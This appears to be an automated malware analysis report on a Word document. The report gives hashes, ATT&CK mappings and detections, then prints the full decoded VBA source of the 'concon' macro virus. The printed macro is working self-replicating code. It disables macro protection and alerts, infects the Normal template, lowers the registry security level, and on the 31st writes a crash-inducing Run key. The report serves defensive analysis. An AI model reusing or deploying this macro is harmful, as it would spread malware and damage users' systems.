Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1df4b74f806456d6…

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-04-25 19:04:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 7cbab9b59757fbc0f8be88b22c77f063 SHA-1: c2043c5496f8c3d8dcd4034dcaf84cddfb1ad221 SHA-256: 1df4b74f806456d64f3467f36144c996684a44a121fb6ddb546fb365ecbdd557
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing a VBA macro with an AutoClose subroutine. This macro attempts to export itself and import it into the Normal template, indicating an attempt to establish persistence. It also attempts to write to the registry Run key with the value 'c:\con\con', likely to execute a second-stage payload.

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1966 bytes
SHA-256: 43d230fe7d1be1336a058c5ef266bbf663c501476efa76ca1133c9ef01a04c27
Detection
ClamAV: Doc.Trojan.Concon-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "concon"
Sub AutoClose()
On Error Resume Next
Dim FY, SNP
FY = (Rnd * 0)
SNP = (Rnd * 0)
Options.VirusProtection = FY
Options.SaveNormalPrompt = SNP
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
CommandBars("Tools").Controls("Macro").Delete
Const Exportf = "c:\boot.386"
Const Ego = "concon"
Set ADoc = ActiveDocument.VBProject.VBComponents
Set NTmp = NormalTemplate.VBProject.VBComponents
ADoc(Ego).Export Exportf
NTmp(Ego).Export Exportf
For I = 1 To NTmp.Count
If NTmp(I).Name = Ego Then NtmpOK = True
Next I
For I = 1 To ADoc.Count
If ADoc(I).Name = Ego Then DocOK = True
Next I
If DocOK = True And NtmpOK = False Then Set Stoj = NormalTemplate.VBProject _
Else: If DocOK = False And NtmpOK = True Then Set Stoj = ActiveDocument.VBProject
Stoj.VBComponents.Import Exportf
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Call Pay
End Sub
Sub Pay()
Dim Xday, Strn
Xday = Date
Strn = Format(Xday, "d")
If Strn = 31 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "") = "c:\con\con"
Dim Msg, Style, Title, Response
Msg = "Shutdown all applications and reboot"
Style = vbOK + vbCritical + vbSystemModal
Title = "Error"
Response = MsgBox(Msg, Style, Title)
End If
' (c) Pvx 2000 only for research purposes
' concon exploit virus (word97/2000 compatible) dont distribute
End Sub